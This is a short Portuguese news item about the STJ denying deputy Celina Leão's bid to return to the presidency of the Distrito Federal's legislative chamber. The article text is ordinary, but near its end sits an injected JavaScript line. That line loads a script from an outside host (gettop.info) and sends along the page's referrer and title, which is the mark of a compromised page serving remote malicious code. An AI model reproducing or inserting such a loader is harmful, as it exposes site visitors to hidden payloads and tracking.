STJ nega retorno de Celina Leão à presidência da CLDF

O desembargador Antonio Saldanha Palheiro, da Quinta Turma do Superior Tribunal de Justiça (STJ), negou, nesta tarde de sexta-feira (11), o pedido da deputada distrital Celina Leão (PPS) para voltar a ocupar presidência da Câmara Legislativa.

Em menos de um mês, é a segunda derrota sofrida pela distrital nos tribunais. Em recurso analisado no dia 17 de outubro, 11 dos 21 desembargadores do Conselho Especial do Tribunal de Justiça do Distrito Federal e Territórios (TJDFT) deram manutenção ao impedimento da deputada.

Na ocasião, o deputado distrital Raimundo Ribeiro, que havia entrado com recurso junto com a ex-presidente da CLDF, obteve os votos necessários para retornar a primeira secretaria da Mesa Diretora.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Fonte:

Deixe um comentário